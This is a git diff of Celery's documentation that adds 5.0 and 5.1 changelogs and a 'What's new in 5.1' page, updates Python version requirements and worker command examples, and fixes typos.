- Celery 5.x requires Python 3.6 or newer is required.
+ Celery 5.x requires Python 3.6 or newer.
+ Celery 5.1.x also requires Python 3.6 or newer.
+ Celery 5.2.x requires Python 3.7 or newer.
+
If you're running an older version of Python, you need to be running
an older version of Celery:
diff --git a/docs/getting-started/next-steps.rst b/docs/getting-started/next-steps.rst
index 1cf0b35f714..d919d0e57c5 100644
--- a/docs/getting-started/next-steps.rst
+++ b/docs/getting-started/next-steps.rst
@@ -74,7 +74,7 @@ The :program:`celery` program can be used to start the worker (you need to run t
.. code-block:: console
- $ celery -A proj worker -l info
+ $ celery -A proj worker -l INFO
When the worker starts you should see a banner and some messages::
@@ -152,7 +152,7 @@ start one or more workers in the background:
.. code-block:: console
- $ celery multi start w1 -A proj -l info
+ $ celery multi start w1 -A proj -l INFO
celery multi v4.0.0 (latentcall)
> Starting nodes...
> w1.halcyon.local: OK
@@ -161,7 +161,7 @@ You can restart it too:
.. code-block:: console
- $ celery multi restart w1 -A proj -l info
+ $ celery multi restart w1 -A proj -l INFO
celery multi v4.0.0 (latentcall)
> Stopping nodes...
> w1.halcyon.local: TERM -> 64024
@@ -176,7 +176,7 @@ or stop it:
.. code-block:: console
- $ celery multi stop w1 -A proj -l info
+ $ celery multi stop w1 -A proj -l INFO
The ``stop`` command is asynchronous so it won't wait for the
worker to shutdown. You'll probably want to use the ``stopwait`` command
@@ -185,7 +185,7 @@ before exiting:
.. code-block:: console
- $ celery multi stopwait w1 -A proj -l info
+ $ celery multi stopwait w1 -A proj -l INFO
.. note::
@@ -202,7 +202,7 @@ you're encouraged to put these in a dedicated directory:
$ mkdir -p /var/run/celery
$ mkdir -p /var/log/celery
- $ celery multi start w1 -A proj -l info --pidfile=/var/run/celery/%n.pid \
+ $ celery multi start w1 -A proj -l INFO --pidfile=/var/run/celery/%n.pid \
--logfile=/var/log/celery/%n%I.log
With the multi command you can start multiple workers, and there's a powerful
@@ -211,7 +211,7 @@ for example:
.. code-block:: console
- $ celery multi start 10 -A proj -l info -Q:1-3 images,video -Q:4,5 data \
+ $ celery multi start 10 -A proj -l INFO -Q:1-3 images,video -Q:4,5 data \
-Q default -L:4,5 debug
For more examples see the :mod:`~celery.bin.multi` module in the API
@@ -766,13 +766,6 @@ If you have strict fair scheduling requirements, or want to optimize
for throughput then you should read the :ref:`Optimizing Guide
`.
-If you're using RabbitMQ then you can install the :pypi:`librabbitmq`
-module, an AMQP client implemented in C:
-
-.. code-block:: console
-
- $ pip install librabbitmq
-
What to do now?
===============
diff --git a/docs/history/changelog-4.4.rst b/docs/history/changelog-4.4.rst
index 506672c4f0a..e6a851676cd 100644
--- a/docs/history/changelog-4.4.rst
+++ b/docs/history/changelog-4.4.rst
@@ -25,7 +25,7 @@ an overview of what's new in Celery 4.4.
- Fix REMAP_SIGTERM=SIGQUIT not working
- (Fixes#6258) MongoDB: fix for serialization issue (#6259)
- Make use of ordered sets in Redis opt-in
-- Test, CI, Docker & style and minor doc impovements.
+- Test, CI, Docker & style and minor doc improvements.
4.4.6
=======
diff --git a/docs/history/changelog-5.0.rst b/docs/history/changelog-5.0.rst
new file mode 100644
index 00000000000..78832a373dc
--- /dev/null
+++ b/docs/history/changelog-5.0.rst
@@ -0,0 +1,173 @@
+================
+ Change history
+================
+
+This document contains change notes for bugfix & new features
+in the 5.0.x series, please see :ref:`whatsnew-5.0` for
+an overview of what's new in Celery 5.0.
+
+.. _version-5.0.6:
+
+5.0.6
+=====
+:release-date: 2021-06-28 3.00 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Inspect commands accept arguments again (#6710).
+- The :setting:`worker_pool` setting is now respected correctly (#6711).
+- Ensure AMQPContext exposes an app attribute (#6741).
+- Exit celery with non zero exit value if failing (#6602).
+- --quiet flag now actually makes celery avoid producing logs (#6599).
+- pass_context for handle_preload_options decorator (#6583).
+- Fix --pool=threads support in command line options parsing (#6787).
+- Fix the behavior of our json serialization which regressed in 5.0 (#6561).
+- celery -A app events -c camera now works as expected (#6774).
+
+.. _version-5.0.5:
+
+5.0.5
+=====
+:release-date: 2020-12-16 5.35 P.M UTC+2:00
+:release-by: Omer Katz
+
+- Ensure keys are strings when deleting results from S3 (#6537).
+- Fix a regression breaking `celery --help` and `celery events` (#6543).
+
+.. _version-5.0.4:
+
+5.0.4
+=====
+:release-date: 2020-12-08 2.40 P.M UTC+2:00
+:release-by: Omer Katz
+
+- DummyClient of cache+memory:// backend now shares state between threads (#6524).
+
+ This fixes a problem when using our pytest integration with the in memory
+ result backend.
+ Because the state wasn't shared between threads, #6416 results in test suites
+ hanging on `result.get()`.
+
+.. _version-5.0.3:
+
+5.0.3
+=====
+:release-date: 2020-12-03 6.30 P.M UTC+2:00
+:release-by: Omer Katz
+
+- Make `--workdir` eager for early handling (#6457).
+- When using the MongoDB backend, don't cleanup if result_expires is 0 or None (#6462).
+- Fix passing queues into purge command (#6469).
+- Restore `app.start()` and `app.worker_main()` (#6481).
+- Detaching no longer creates an extra log file (#6426).
+- Result backend instances are now thread local to ensure thread safety (#6416).
+- Don't upgrade click to 8.x since click-repl doesn't support it yet.
+- Restore preload options (#6516).
+
+.. _version-5.0.2:
+
+5.0.2
+=====
+:release-date: 2020-11-02 8.00 P.M UTC+2:00
+:release-by: Omer Katz
+
+- Fix _autodiscover_tasks_from_fixups (#6424).
+- Flush worker prints, notably the banner (#6432).
+- **Breaking Change**: Remove `ha_policy` from queue definition. (#6440)
+
+ This argument has no effect since RabbitMQ 3.0.
+    Therefore, we feel comfortable dropping it in a patch release.
+
+- Python 3.9 support (#6418).
+- **Regression**: When using the prefork pool, pick the fair scheduling strategy by default (#6447).
+- Preserve callbacks when replacing a task with a chain (#6189).
+- Fix max_retries override on `self.retry()` (#6436).
+- Raise proper error when replacing with an empty chain (#6452)
+
+.. _version-5.0.1:
+
+5.0.1
+=====
+:release-date: 2020-10-18 1.00 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Specify UTF-8 as the encoding for log files (#6357).
+- Custom headers now propagate when using the protocol 1 hybrid messages (#6374).
+- Retry creating the database schema for the database results backend
+ in case of a race condition (#6298).
+- When using the Redis results backend, awaiting a chord no longer hangs
+ when setting :setting:`result_expires` to 0 (#6373).
+- When a user tries to specify the app as an option for the subcommand,
+ a custom error message is displayed (#6363).
+- Fix the `--without-gossip`, `--without-mingle`, and `--without-heartbeat`
+ options which now work as expected. (#6365)
+- Provide a clearer error message when the application cannot be loaded.
+- Avoid printing deprecation warnings for settings when they are loaded from
+ Django settings (#6385).
+- Allow lowercase log levels for the `--loglevel` option (#6388).
+- Detaching now works as expected (#6401).
+- Restore broadcasting messages from `celery control` (#6400).
+- Pass back real result for single task chains (#6411).
+- Ensure group tasks are deeply serialized (#6342).
+- Fix chord element counting (#6354).
+- Restore the `celery shell` command (#6421).
+
+.. _version-5.0.0:
+
+5.0.0
+=====
+:release-date: 2020-09-24 6.00 P.M UTC+3:00
+:release-by: Omer Katz
+
+- **Breaking Change** Remove AMQP result backend (#6360).
+- Warn when deprecated settings are used (#6353).
+- Expose retry_policy for Redis result backend (#6330).
+- Prepare Celery to support the yet to be released Python 3.9 (#6328).
+
+5.0.0rc3
+========
+:release-date: 2020-09-07 4.00 P.M UTC+3:00
+:release-by: Omer Katz
+
+- More cleanups of leftover Python 2 support (#6338).
+
+5.0.0rc2
+========
+:release-date: 2020-09-01 6.30 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Bump minimum required eventlet version to 0.26.1.
+- Update Couchbase Result backend to use SDK V3.
+- Restore monkeypatching when gevent or eventlet are used.
+
+5.0.0rc1
+========
+:release-date: 2020-08-24 9.00 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Allow opting out of ordered group results when using the Redis result backend (#6290).
+- **Breaking Change** Remove the deprecated celery.utils.encoding module.
+
+5.0.0b1
+=======
+:release-date: 2020-08-19 8.30 P.M UTC+3:00
+:release-by: Omer Katz
+
+- **Breaking Change** Drop support for the Riak result backend (#5686).
+- **Breaking Change** pytest plugin is no longer enabled by default (#6288).
+ Install pytest-celery to enable it.
+- **Breaking Change** Brand new CLI based on Click (#5718).
+
+5.0.0a2
+=======
+:release-date: 2020-08-05 7.15 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Bump Kombu version to 5.0 (#5686).
+
+5.0.0a1
+=======
+:release-date: 2020-08-02 9.30 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Removed most of the compatibility code that supports Python 2 (#5686).
+- Modernized code to work on Python 3.6 and above (#5686).
diff --git a/docs/history/changelog-5.1.rst b/docs/history/changelog-5.1.rst
new file mode 100644
index 00000000000..5b724b1536d
--- /dev/null
+++ b/docs/history/changelog-5.1.rst
@@ -0,0 +1,139 @@
+.. _changelog:
+
+================
+ Change history
+================
+
+This document contains change notes for bugfix & new features
+in the 5.1.x series, please see :ref:`whatsnew-5.1` for
+an overview of what's new in Celery 5.1.
+
+.. _version-5.1.2:
+
+5.1.2
+=====
+:release-date: 2021-06-28 16.15 P.M UTC+3:00
+:release-by: Omer Katz
+
+- When chords fail, correctly call errbacks. (#6814)
+
+ We had a special case for calling errbacks when a chord failed which
+ assumed they were old style. This change ensures that we call the proper
+ errback dispatch method which understands new and old style errbacks,
+ and adds test to confirm that things behave as one might expect now.
+- Avoid using the ``Event.isSet()`` deprecated alias. (#6824)
+- Reintroduce sys.argv default behaviour for ``Celery.start()``. (#6825)
+
+.. _version-5.1.1:
+
+5.1.1
+=====
+:release-date: 2021-06-17 16.10 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Fix ``--pool=threads`` support in command line options parsing. (#6787)
+- Fix ``LoggingProxy.write()`` return type. (#6791)
+- Couchdb key is now always coerced into a string. (#6781)
+- grp is no longer imported unconditionally. (#6804)
+ This fixes a regression in 5.1.0 when running Celery in non-unix systems.
+- Ensure regen utility class gets marked as done when concretised. (#6789)
+- Preserve call/errbacks of replaced tasks. (#6770)
+- Use single-lookahead for regen consumption. (#6799)
+- Revoked tasks are no longer incorrectly marked as retried. (#6812, #6816)
+
+.. _version-5.1.0:
+
+5.1.0
+=====
+:release-date: 2021-05-23 19.20 P.M UTC+3:00
+:release-by: Omer Katz
+
+- ``celery -A app events -c camera`` now works as expected. (#6774)
+- Bump minimum required Kombu version to 5.1.0.
+
+.. _version-5.1.0rc1:
+
+5.1.0rc1
+========
+:release-date: 2021-05-02 16.06 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Celery Mailbox accept and serializer parameters are initialized from configuration. (#6757)
+- Error propagation and errback calling for group-like signatures now works as expected. (#6746)
+- Fix sanitization of passwords in sentinel URIs. (#6765)
+- Add LOG_RECEIVED to customize logging. (#6758)
+
+.. _version-5.1.0b2:
+
+5.1.0b2
+=======
+:release-date: 2021-05-02 16.06 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Fix the behavior of our json serialization which regressed in 5.0. (#6561)
+- Add support for SQLAlchemy 1.4. (#6709)
+- Safeguard against schedule entry without kwargs. (#6619)
+- ``task.apply_async(ignore_result=True)`` now avoids persisting the results. (#6713)
+- Update systemd tmpfiles path. (#6688)
+- Ensure AMQPContext exposes an app attribute. (#6741)
+- Inspect commands accept arguments again (#6710).
+- Chord counting of group children is now accurate. (#6733)
+- Add a setting :setting:`worker_cancel_long_running_tasks_on_connection_loss`
+ to terminate tasks with late acknowledgement on connection loss. (#6654)
+- The ``task-revoked`` event and the ``task_revoked`` signal are not duplicated
+ when ``Request.on_failure`` is called. (#6654)
+- Restore pickling support for ``Retry``. (#6748)
+- Add support in the redis result backend for authenticating with a username. (#6750)
+- The :setting:`worker_pool` setting is now respected correctly. (#6711)
+
+.. _version-5.1.0b1:
+
+5.1.0b1
+=======
+:release-date: 2021-04-02 10.25 P.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Add sentinel_kwargs to Redis Sentinel docs.
+- Depend on the maintained python-consul2 library. (#6544).
+- Use result_chord_join_timeout instead of hardcoded default value.
+- Upgrade AzureBlockBlob storage backend to use Azure blob storage library v12 (#6580).
+- Improved integration tests.
+- pass_context for handle_preload_options decorator (#6583).
+- Makes regen less greedy (#6589).
+- Pytest worker shutdown timeout (#6588).
+- Exit celery with non zero exit value if failing (#6602).
+- Raise BackendStoreError when set value is too large for Redis.
+- Trace task optimizations are now set via Celery app instance.
+- Make trace_task_ret and fast_trace_task public.
+- reset_worker_optimizations and create_request_cls now take app as an optional parameter.
+- Small refactor in exception handling of on_failure (#6633).
+- Fix for issue #5030 "Celery Result backend on Windows OS".
+- Add store_eager_result setting so eager tasks can store result on the result backend (#6614).
+- Allow heartbeats to be sent in tests (#6632).
+- Fixed default visibility timeout note in sqs documentation.
+- Support Redis Sentinel with SSL.
+- Simulate more exhaustive delivery info in apply().
+- Start chord header tasks as soon as possible (#6576).
+- Forward shadow option for retried tasks (#6655).
+- --quiet flag now actually makes celery avoid producing logs (#6599).
+- Update platforms.py "superuser privileges" check (#6600).
+- Remove unused property `autoregister` from the Task class (#6624).
+- fnmatch.translate() already translates globs for us. (#6668).
+- Upgrade some syntax to Python 3.6+.
+- Add `azureblockblob_base_path` config (#6669).
+- Fix checking expiration of X.509 certificates (#6678).
+- Drop the lzma extra.
+- Fix JSON decoding errors when using MongoDB as backend (#6675).
+- Allow configuration of RedisBackend's health_check_interval (#6666).
+- Safeguard against schedule entry without kwargs (#6619).
+- Docs only - SQS broker - add STS support (#6693) through kombu.
+- Drop fun_accepts_kwargs backport.
+- Tasks can now have required kwargs in any order (#6699).
+- Minimum py-amqp is now 5.0.6.
+- Minimum billiard is now 3.6.4.0.
+- Minimum kombu is now 5.1.0b1.
+- Numerous docs fixes.
+- Moved CI to GitHub Actions.
+- Updated deployment scripts.
+- Updated Docker.
+- Initial support for Python 3.9 added.
diff --git a/docs/history/index.rst b/docs/history/index.rst
index 05dd08a17dc..35423550084 100644
--- a/docs/history/index.rst
+++ b/docs/history/index.rst
@@ -13,6 +13,10 @@ version please visit :ref:`changelog`.
.. toctree::
:maxdepth: 2
+ whatsnew-5.1
+ changelog-5.1
+ whatsnew-5.0
+ changelog-5.0
whatsnew-4.4
changelog-4.4
whatsnew-4.3
diff --git a/docs/history/whatsnew-3.0.rst b/docs/history/whatsnew-3.0.rst
index 3b06ab91d14..7abd3229bac 100644
--- a/docs/history/whatsnew-3.0.rst
+++ b/docs/history/whatsnew-3.0.rst
@@ -524,7 +524,7 @@ stable and is now documented as part of the official API.
.. code-block:: pycon
>>> celery.control.pool_grow(2, destination=['w1.example.com'])
- >>> celery.contorl.pool_shrink(2, destination=['w1.example.com'])
+ >>> celery.control.pool_shrink(2, destination=['w1.example.com'])
or using the :program:`celery control` command:
diff --git a/docs/history/whatsnew-4.4.rst b/docs/history/whatsnew-4.4.rst
index 1f252de30a5..24b4ac61b3b 100644
--- a/docs/history/whatsnew-4.4.rst
+++ b/docs/history/whatsnew-4.4.rst
@@ -51,7 +51,7 @@ This release has been codenamed `Cliffs ` for details.
Click provides shell completion `out of the box `_.
This functionality replaces our previous bash completion script and adds
@@ -279,7 +299,7 @@ Starting from Celery 5.0, the pytest plugin is no longer enabled by default.
Please refer to the :ref:`documentation ` for instructions.
Ordered Group Results for the Redis Result Backend
--------------------------------------------------
+--------------------------------------------------
Previously group results were not ordered by their invocation order.
Celery 4.4.7 introduced an opt-in feature to make them ordered.
@@ -287,7 +307,7 @@ Celery 4.4.7 introduced an opt-in feature to make them ordered.
It is now an opt-out behavior.
If you were previously using the Redis result backend, you might need to
-out-out of this behavior.
+opt-out of this behavior.
Please refer to the :ref:`documentation `
for instructions on how to disable this feature.
diff --git a/docs/history/whatsnew-5.1.rst b/docs/history/whatsnew-5.1.rst
new file mode 100644
index 00000000000..a1c7416cdda
--- /dev/null
+++ b/docs/history/whatsnew-5.1.rst
@@ -0,0 +1,419 @@
+.. _whatsnew-5.1:
+
+=========================================
+ What's new in Celery 5.1 (Sun Harmonics)
+=========================================
+:Author: Josue Balandrano Coronel (``jbc at rmcomplexity.com``)
+
+.. sidebar:: Change history
+
+ What's new documents describe the changes in major versions,
+ we also have a :ref:`changelog` that lists the changes in bugfix
+ releases (0.0.x), while older series are archived under the :ref:`history`
+ section.
+
+Celery is a simple, flexible, and reliable distributed programming framework
+to process vast amounts of messages, while providing operations with
+the tools required to maintain a distributed system with Python.
+
+It's a task queue with focus on real-time processing, while also
+supporting task scheduling.
+
+Celery has a large and diverse community of users and contributors;
+you should come join us :ref:`on IRC `
+or :ref:`our mailing-list `.
+
+To read more about Celery you should go read the :ref:`introduction `.
+
+While this version is **mostly** backward compatible with previous versions,
+it's important that you read the following section as this release
+is a new major version.
+
+This version is officially supported on CPython 3.6, 3.7, 3.8 & 3.9
+and is also supported on PyPy3.
+
+.. _`website`: http://celeryproject.org/
+
+.. topic:: Table of Contents
+
+ Make sure you read the important notes before upgrading to this version.
+
+.. contents::
+ :local:
+ :depth: 2
+
+Preface
+=======
+
+The 5.1.0 release is a new minor release for Celery.
+
+Starting from now users should expect more frequent releases of major versions
+as we move fast and break things to bring you an even better experience.
+
+Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_.
+This release has been codenamed `Sun Harmonics `_.
+
+From now on we only support Python 3.6 and above.
+We will maintain compatibility with Python 3.6 until its
+EOL in December 2021.
+
+*— Omer Katz*
+
+Long Term Support Policy
+------------------------
+
+As we'd like to provide some time for you to transition,
+we're designating Celery 4.x an LTS release.
+Celery 4.x will be supported until the 1st of August, 2021.
+
+We will accept and apply patches for bug fixes and security issues.
+However, no new features will be merged for that version.
+
+Celery 5.x **is not** an LTS release. We will support it until the release
+of Celery 6.x.
+
+We're in the process of defining our Long Term Support policy.
+Watch the next "What's New" document for updates.
+
+Wall of Contributors
+--------------------
+
+0xflotus <0xflotus@gmail.com>
+AbdealiJK
+Anatoliy
+Anna Borzenko
+aruseni
+Asif Saif Uddin (Auvi)
+Asif Saif Uddin
+Awais Qureshi
+careljonkhout
+Christian Clauss
+danthegoodman1
+Dave Johansen
+David Schneider
+Fahmi
+Felix Yan
+Gabriel Augendre
+galcohen
+gal cohen
+Geunsik Lim
+Guillaume DE SUSANNE D'EPINAY
+Hilmar Hilmarsson
+Illia Volochii
+jenhaoyang
+Jonathan Stoppani
+Josue Balandrano Coronel
+kosarchuksn
+Kostya Deev
+Matt Hoffman
+Matus Valo
+Myeongseok Seo
+Noam
+Omer Katz
+pavlos kallis
+Pavol Plaskoň
+Pengjie Song (宋鹏捷)
+Sardorbek Imomaliev
+Sergey Lyapustin
+Sergey Tikhonov
+Stephen J. Fuhry
+Swen Kooij
+tned73
+Tomas Hrnciar
+tumb1er
+
+.. note::
+
+ This wall was automatically generated from git history,
+ so sadly it doesn't include the people who help with more important
+ things like answering mailing-list questions.
+
+Upgrading from Celery 4.x
+=========================
+
+Step 1: Adjust your command line invocation
+-------------------------------------------
+
+Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible.
+
+The global options can no longer be positioned after the sub-command.
+Instead, they must be positioned as an option for the `celery` command like so::
+
+ celery --app path.to.app worker
+
+If you were using our :ref:`daemonizing` guide to deploy Celery in production,
+you should revisit it for updates.
+
+Step 2: Update your configuration with the new setting names
+------------------------------------------------------------
+
+If you haven't already updated your configuration when you migrated to Celery 4.0,
+please do so now.
+
+We elected to extend the deprecation period until 6.0 since
+we did not loudly warn about using these deprecated settings.
+
+Please refer to the :ref:`migration guide ` for instructions.
+
+Step 3: Read the important notes in this document
+-------------------------------------------------
+
+Make sure you are not affected by any of the important upgrade notes
+mentioned in the :ref:`following section `.
+
+You should verify that none of the breaking changes in the CLI
+affect you. Please refer to :ref:`New Command Line Interface ` for details.
+
+Step 4: Migrate your code to Python 3
+-------------------------------------
+
+Celery 5.x only supports Python 3. Therefore, you must ensure your code is
+compatible with Python 3.
+
+If you haven't ported your code to Python 3, you must do so before upgrading.
+
+You can use tools like `2to3 `_
+and `pyupgrade `_ to assist you with
+this effort.
+
+After the migration is done, run your test suite with Celery 4 to ensure
+nothing has been broken.
+
+Step 5: Upgrade to Celery 5.1
+-----------------------------
+
+At this point you can upgrade your workers and clients with the new version.
+
+.. _v510-important:
+
+Important Notes
+===============
+
+Supported Python Versions
+-------------------------
+
+The supported Python Versions are:
+
+- CPython 3.6
+- CPython 3.7
+- CPython 3.8
+- CPython 3.9
+- PyPy3.6 7.2 (``pypy3``)
+
+Important Notes
+---------------
+
+Kombu
+~~~~~
+
+Starting from v5.1, the minimum required version is Kombu 5.1.0.
+
+Billiard
+~~~~~~~~
+
+Starting from v5.1, the minimum required version is Billiard 3.6.4.
+
+Important Notes From 5.0
+------------------------
+
+Dropped support for Python 2.7 & 3.5
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Celery now requires Python 3.6 and above.
+
+Python 2.7 reached EOL in January 2020.
+In order to focus our efforts we have dropped support for Python 2.7 in
+this version.
+
+In addition, Python 3.5 reached EOL in September 2020.
+Therefore, we are also dropping support for Python 3.5.
+
+If you still need to run Celery using Python 2.7 or Python 3.5,
+you can still use Celery 4.x.
+However, we encourage you to upgrade to a supported Python version since
+no further security patches will be applied for Python 2.7 or
+Python 3.5.
+
+Eventlet Workers Pool
+~~~~~~~~~~~~~~~~~~~~~
+
+Due to `eventlet/eventlet#526 `_
+the minimum required version is eventlet 0.26.1.
+
+Gevent Workers Pool
+~~~~~~~~~~~~~~~~~~~
+
+Starting from v5.0, the minimum required version is gevent 1.0.0.
+
+Couchbase Result Backend
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+The Couchbase result backend now uses the V3 Couchbase SDK.
+
+As a result, we no longer support Couchbase Server 5.x.
+
+Also, starting from v5.0, the minimum required version
+for the database client is couchbase 3.0.0.
+
+To verify that your Couchbase Server is compatible with the V3 SDK,
+please refer to their `documentation `_.
+
+Riak Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The Riak result backend has been removed as the database is no longer maintained.
+
+The Python client only supports Python 3.6 and below, which prevents us from
+supporting it, and it is also unmaintained.
+
+If you are still using Riak, refrain from upgrading to Celery 5.0 while you
+migrate your application to a different database.
+
+We apologize for the lack of advance notice, but we feel that the chance
+you'll be affected by this breaking change is minimal, which is why we
+did it.
+
+AMQP Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The AMQP result backend has been removed as it was deprecated in version 4.0.
+
+Removed Deprecated Modules
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The `celery.utils.encoding` and the `celery.task` modules have been deprecated
+in version 4.0 and are therefore removed in 5.0.
+
+If you were using the `celery.utils.encoding` module before,
+you should import `kombu.utils.encoding` instead.
+
+If you were using the `celery.task` module before, you should import directly
+from the `celery` module instead.
+
+If you were using `from celery.task import Task` you should use
+`from celery import Task` instead.
+
+If you were using the `celery.task` decorator you should use
+`celery.shared_task` instead.
+
+
+`azure-servicebus` 7.0.0 is now required
+----------------------------------------
+
+Given the SDK changes between 0.50.0 and 7.0.0, Kombu deprecates support for
+older `azure-servicebus` versions.
+
+.. _v510-news:
+
+News
+====
+
+Support for Azure Service Bus 7.0.0
+-----------------------------------
+
+With Kombu v5.1.0 we now support Azure Service Bus.
+
+Azure has completely changed the Azure ServiceBus SDK between 0.50.0 and 7.0.0.
+`azure-servicebus >= 7.0.0` is now required for Kombu `5.1.0`.
+
+Add support for SQLAlchemy 1.4
+------------------------------
+
+Following the changes in SQLAlchemy 1.4, the declarative base is no
+longer an extension.
+Importing it from sqlalchemy.ext.declarative is deprecated and will
+be removed in SQLAlchemy 2.0.
+
+Support for Redis username authentication
+-----------------------------------------
+
+Previously, the username was ignored in the URI.
+Starting from Redis>=6.0, that shouldn't be the case since ACL support has landed.
+
+Please refer to the :ref:`documentation <conf-redis-result-backend>` for details.
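+
+For example, assuming a Redis 6.0+ server with an ACL user configured
+(the credentials and host below are placeholders, not values from this release):
+
+.. code-block:: python
+
+    result_backend = 'redis://myuser:mypassword@localhost:6379/0'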
+
+SQS transport - support back off policy
+----------------------------------------
+
+SQS now supports managed visibility timeout. This lets us implement a back off
+policy (for instance, an exponential policy) which means that the time between
+task failures will dynamically change based on the number of retries.
+
+Documentation: :doc:`reference/kombu.transport.SQS`
+
+Duplicate successful tasks
+---------------------------
+
+The trace function fetches the metadata from the backend each time it
+receives a task and compares its state. If the state is SUCCESS,
+we log and bail instead of executing the task.
+The task is acknowledged and everything proceeds normally.
+
+Documentation: :setting:`worker_deduplicate_successful_tasks`
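+
+A minimal sketch of enabling this check from your configuration module
+(the state file path is only an illustration):
+
+.. code-block:: python
+
+    # Skip re-executing redelivered tasks that already succeeded.
+    worker_deduplicate_successful_tasks = True
+    # Optional: make the local cache of successful task ids persistent.
+    worker_state_db = '/var/run/celery/worker.state'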
+
+Terminate tasks with late acknowledgment on connection loss
+-----------------------------------------------------------
+
+Tasks with late acknowledgement keep running after restart,
+although the connection is lost and they cannot be
+acknowledged anymore. These tasks will now be terminated.
+
+Documentation: :setting:`worker_cancel_long_running_tasks_on_connection_loss`
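+
+A minimal sketch of opting in (late acknowledgement is shown globally here
+purely for illustration):
+
+.. code-block:: python
+
+    task_acks_late = True
+    # Cancel still-running late-ack tasks when the broker connection is lost.
+    worker_cancel_long_running_tasks_on_connection_loss = True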
+
+`task.apply_async(ignore_result=True)` now avoids persisting the result
+-----------------------------------------------------------------------
+
+`task.apply_async` now supports passing `ignore_result` which will act the same
+as using ``@app.task(ignore_result=True)``.
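+
+For example, assuming an ``add`` task as used elsewhere in these docs:
+
+.. code-block:: python
+
+    # No result is persisted to the result backend for this invocation.
+    add.apply_async((2, 2), ignore_result=True)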
+
+Use a thread-safe implementation of `cached_property`
+-----------------------------------------------------
+
+`cached_property` is heavily used in Celery, but it is causing
+issues in multi-threaded code since it is not thread-safe.
+Celery is now using a thread-safe implementation of `cached_property`.
+
+Tasks can now have required kwargs in any order
+------------------------------------------------
+
+Tasks can now be defined like this:
+
+.. code-block:: python
+
+ from celery import shared_task
+
+ @shared_task
+ def my_func(*, name='default', age, city='Kyiv'):
+ pass
+
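+The required keyword argument is then simply passed by name when calling the
+task defined above, for instance:
+
+.. code-block:: python
+
+    my_func.delay(age=42)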
+
+SQS - support STS authentication with AWS
+-----------------------------------------
+
+The STS token requires a refresh after a certain period of time.
+After `sts_token_timeout` is reached, a new token will be created.
+
+Documentation: :doc:`getting-started/backends-and-brokers/sqs`
+
+Support Redis `health_check_interval`
+-------------------------------------
+
+`health_check_interval` can be configured and will be passed to `redis-py`.
+
+Documentation: :setting:`redis_backend_health_check_interval`
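+
+For example (the interval below is an arbitrary illustrative value):
+
+.. code-block:: python
+
+    # Ping the Redis result backend connection every 25 seconds.
+    redis_backend_health_check_interval = 25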
+
+
+Update default pickle protocol version to 4
+--------------------------------------------
+
+The pickle protocol version was updated to allow Celery to serialize larger
+strings among other benefits.
+
+See: https://docs.python.org/3.9/library/pickle.html#data-stream-format
+
+
+Support Redis Sentinel with SSL
+-------------------------------
+
+See documentation for more info:
+:doc:`getting-started/backends-and-brokers/redis`
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 0ba1f965b3f..a5a59d9b467 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.0.0 (cliffs)
+:Version: 5.2.2 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -37,16 +37,13 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 4.4 runs on,
+Celery version 5.1.x runs on,
-- Python (2.7, 3.5, 3.6, 3.7, 38)
-- PyPy2.7 (7.3)
-- PyPy3.5 (7.1)
-- PyPy3.6 (7.3)
+- Python 3.6 or newer versions
+- PyPy3.6 (7.3) or newer
-This is the last version to support Python 2.7,
-and from the next version (Celery 5.x) Python 3.6 or newer is required.
+From the next major version (Celery 6.x) Python 3.7 or newer is required.
If you're running an older version of Python, you need to be running
an older version of Celery:
@@ -71,7 +68,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 4.0 coming from previous versions then you should read our
+new to Celery 5.0.x or 5.1.x coming from previous versions, then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/docs/includes/resources.txt b/docs/includes/resources.txt
index 1afe96e546d..07681a464d7 100644
--- a/docs/includes/resources.txt
+++ b/docs/includes/resources.txt
@@ -18,10 +18,10 @@ please join the `celery-users`_ mailing list.
IRC
---
-Come chat with us on IRC. The **#celery** channel is located at the `Freenode`_
+Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_
network.
-.. _`Freenode`: https://freenode.net
+.. _`Libera Chat`: https://libera.chat/
.. _bug-tracker:
diff --git a/docs/index.rst b/docs/index.rst
index 2a9de61c06d..915b7c088aa 100644
--- a/docs/index.rst
+++ b/docs/index.rst
@@ -58,7 +58,7 @@ Contents
tutorials/index
faq
changelog
- whatsnew-5.0
+ whatsnew-5.2
reference/index
internals/index
history/index
diff --git a/docs/internals/app-overview.rst b/docs/internals/app-overview.rst
index a46021e105b..965a148cca2 100644
--- a/docs/internals/app-overview.rst
+++ b/docs/internals/app-overview.rst
@@ -100,18 +100,7 @@ Deprecated
Aliases (Pending deprecation)
=============================
-* ``celery.task.base``
- * ``.Task`` -> {``app.Task`` / :class:`celery.app.task.Task`}
-
-* ``celery.task.sets``
- * ``.TaskSet`` -> {``app.TaskSet``}
-
-* ``celery.decorators`` / ``celery.task``
- * ``.task`` -> {``app.task``}
-
* ``celery.execute``
- * ``.apply_async`` -> {``task.apply_async``}
- * ``.apply`` -> {``task.apply``}
* ``.send_task`` -> {``app.send_task``}
* ``.delay_task`` -> *no alternative*
@@ -146,14 +135,6 @@ Aliases (Pending deprecation)
* ``.get_queues`` -> {``app.amqp.get_queues``}
-* ``celery.task.control``
